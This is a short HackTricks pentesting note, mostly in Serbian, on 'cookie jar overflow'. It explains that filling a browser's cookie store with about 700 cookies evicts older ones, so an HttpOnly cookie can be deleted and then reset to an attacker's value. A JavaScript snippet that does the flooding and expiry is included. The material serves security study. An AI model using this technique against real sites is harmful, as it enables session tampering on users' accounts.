Cookie Jar Overflow

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Pregleda imaju ograničenje na broj kolačića koje mogu da sačuvaju za stranicu. Tada, ako iz nekog razloga treba da naterate kolačić da nestane, možete prepuniti posudu za kolačiće jer će najstariji biti obrisani pre:

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Napomena, da treće strane kolačići koji upućuju na drugačiju domenu neće biti prepisani.

Ovaj napad se takođe može koristiti za prepisivanje HttpOnly kolačića jer ga možete obrisati, a zatim resetovati sa vrednošću koju želite.

Proverite ovo u ovom postu sa laboratorijom.

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Podržite HackTricks

Last updated